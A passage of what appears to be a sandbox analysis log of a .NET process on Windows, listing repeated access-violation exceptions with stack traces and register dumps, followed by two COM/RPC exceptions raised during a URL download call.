GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7677f8b registers.esp: 3926048 registers.edi: 3926332 registers.eax: 0 registers.ebp: 3926056 registers.edx: 0 registers.ebx: 3928740 registers.esi: 43517804 registers.ecx: 43462384	1
__exception__ Oct. 16, 2023, 9:44 a.m.	stacktrace: 0x7677f48 0x76787fe 0x7678250 0x7673a1d 0x767289a 0x76713e6 0x8cc7af 0x8c6d75 0x8c6886 0x8c34ab 0x8c2f10 0x8c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7677f8b registers.esp: 3926008 registers.edi: 3926348 registers.eax: 0 registers.ebp: 3926016 registers.edx: 0 registers.ebx: 3928740 registers.esi: 42383504 registers.ecx: 44919640	1
__exception__ Oct. 16, 2023, 9:44 a.m.	stacktrace: 0x7677f48 0x76787fe 0x7678250 0x7673a35 0x767289a 0x76713e6 0x8cc7af 0x8c6d75 0x8c6886 0x8c34ab 0x8c2f10 0x8c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7677f8b registers.esp: 3926008 registers.edi: 3926348 registers.eax: 0 registers.ebp: 3926016 registers.edx: 0 registers.ebx: 3928740 registers.esi: 42383504 registers.ecx: 46328552	1
__exception__ Oct. 16, 2023, 9:44 a.m.	stacktrace: 0x7677f48 0x76787fe 0x7678250 0x7673a35 0x767289a 0x76713e6 0x8cc7af 0x8c6d75 0x8c6886 0x8c34ab 0x8c2f10 0x8c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7677f8b registers.esp: 3926008 registers.edi: 3926348 registers.eax: 0 registers.ebp: 3926016 registers.edx: 0 registers.ebx: 3928740 registers.esi: 42383504 registers.ecx: 47678224	1
__exception__ Oct. 16, 2023, 9:44 a.m.	stacktrace: 0x7677f48 0x7678ec2 0x7678aa0 0x7673a1d 0x767299c 0x76713e6 0x8cc7af 0x8c6d75 0x8c6886 0x8c34ab 0x8c2f10 0x8c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7677f8b registers.esp: 3926072 registers.edi: 3926348 registers.eax: 0 registers.ebp: 3926080 registers.edx: 0 registers.ebx: 3928740 registers.esi: 42383504 registers.ecx: 42933948	1
__exception__ Oct. 16, 2023, 9:44 a.m.	stacktrace: 0x7677f48 0x7678ec2 0x7678aa0 0x7673a35 0x767299c 0x76713e6 0x8cc7af 0x8c6d75 0x8c6886 0x8c34ab 0x8c2f10 0x8c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7677f8b registers.esp: 3926072 registers.edi: 3926348 registers.eax: 0 registers.ebp: 3926080 registers.edx: 0 registers.ebx: 3928740 registers.esi: 42368356 registers.ecx: 44332152	1
__exception__ Oct. 16, 2023, 9:44 a.m.	stacktrace: 0x7677f48 0x7678ec2 0x7678aa0 0x7673a35 0x767299c 0x76713e6 0x8cc7af 0x8c6d75 0x8c6886 0x8c34ab 0x8c2f10 0x8c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7677f8b registers.esp: 3926072 registers.edi: 3926348 registers.eax: 0 registers.ebp: 3926080 registers.edx: 0 registers.ebx: 3928740 registers.esi: 42368356 registers.ecx: 45730344	1
__exception__ Oct. 16, 2023, 9:44 a.m.	stacktrace: 0x7677f48 0x76793ca 0x7678ff0 0x7673a1d 0x7672a89 0x76713e6 0x8cc7af 0x8c6d75 0x8c6886 0x8c34ab 0x8c2f10 0x8c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7677f8b registers.esp: 3926092 registers.edi: 3926348 registers.eax: 0 registers.ebp: 3926100 registers.edx: 0 registers.ebx: 3928740 registers.esi: 42368356 registers.ecx: 42734152	1
__exception__ Oct. 16, 2023, 9:44 a.m.	stacktrace: 0x7677f48 0x76793ca 0x7678ff0 0x7673a35 0x7672a89 0x76713e6 0x8cc7af 0x8c6d75 0x8c6886 0x8c34ab 0x8c2f10 0x8c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7677f8b registers.esp: 3926092 registers.edi: 3926348 registers.eax: 0 registers.ebp: 3926100 registers.edx: 0 registers.ebx: 3928740 registers.esi: 42368356 registers.ecx: 43877544	1
__exception__ Oct. 16, 2023, 9:44 a.m.	stacktrace: 0x7677f48 0x76793ca 0x7678ff0 0x7673a35 0x7672a89 0x76713e6 0x8cc7af 0x8c6d75 0x8c6886 0x8c34ab 0x8c2f10 0x8c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7677f8b registers.esp: 3926092 registers.edi: 3926348 registers.eax: 0 registers.ebp: 3926100 registers.edx: 0 registers.ebx: 3928740 registers.esi: 42368356 registers.ecx: 45278480	1
__exception__ Oct. 16, 2023, 9:44 a.m.	stacktrace: 0x7677f48 0x767a39f 0x7679b71 0x7671414 0x8cc7af 0x8c6d75 0x8c6886 0x8c34ab 0x8c2f10 0x8c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7677f8b registers.esp: 3926976 registers.edi: 3927256 registers.eax: 0 registers.ebp: 3926984 registers.edx: 0 registers.ebx: 3928740 registers.esi: 45845976 registers.ecx: 45853060	1
__exception__ Oct. 16, 2023, 9:45 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x75b94387 NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x754bef51 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x754b6b42 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x754d5c3a NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x755506b8 WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x75c6d7e6 WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x75c6d876 WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x75c6ddd0 CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x75b88a43 CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x75b88938 DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x75b8950a WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x75c6dccd WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x75c6db41 WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x75c6e1fd DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x75b89367 DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x75b89326 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4 DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755f788a CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x75b4a48b CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x75b4853b CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x75b4a4ac CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x75b5cd48 CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x75b5d87a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 97447616 registers.edi: 78622292 registers.eax: 97447616 registers.ebp: 97447696 registers.edx: 1042194926 registers.ebx: 97447980 registers.esi: 2147746133 registers.ecx: 78270080	1
__exception__ Oct. 16, 2023, 9:45 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x75b3fe14 StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x75c6a338 IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x7532e99f IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x753072ed RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x752fab0d GetIUriPriv2+0x603 CoInternetIsFeatureEnabledForIUri-0xdf6 urlmon+0x1ea98 @ 0x752fea98 RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x752f87f7 CopyStgMedium+0x286 FindMediaType-0x70d urlmon+0x1ba32 @ 0x752fba32 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4 DispatchMessageA+0xf GetMessageA-0x9 user32+0x17bca @ 0x755f7bca CreateAsyncBindCtx+0xb2f URLDownloadToCacheFileW-0x54c urlmon+0x4516f @ 0x7532516f CreateAsyncBindCtx+0xa8e URLDownloadToCacheFileW-0x5ed urlmon+0x450ce @ 0x753250ce RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x752fa0d8 RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x752f9b85 RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x752f9aa8 CreateAsyncBindCtx+0xccc URLDownloadToCacheFileW-0x3af urlmon+0x4530c @ 0x7532530c URLDownloadToCacheFileW+0xe5 CoInternetIsFeatureZoneElevationEnabled-0x2c18 urlmon+0x457a0 @ 0x753257a0 DllCanUnloadNow+0xcfc8 IEAssociateThreadWithTab-0x294dd ieframe+0x2540c @ 0x72c5540c DllCanUnloadNow+0xce86 IEAssociateThreadWithTab-0x2961f ieframe+0x252ca @ 0x72c552ca CreateExtensionGuidEnumerator+0x5d622 SetQueryNetSessionCount-0x15f9a ieframe+0x100ea3 @ 0x72d30ea3 RtlGetUserInfoHeap+0x225 RtlQueueWorkItem-0x210 ntdll+0x67e96 @ 0x77907e96 TpCallbackIndependent+0x527 RtlIsCriticalSectionLockedByThread-0x240 ntdll+0x454f4 @ 0x778e54f4 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 81254792 registers.edi: 1974991376 registers.eax: 81254792 registers.ebp: 81254872 registers.edx: 1 registers.ebx: 8325004 registers.esi: 2147746133 registers.ecx: 2756820785	1
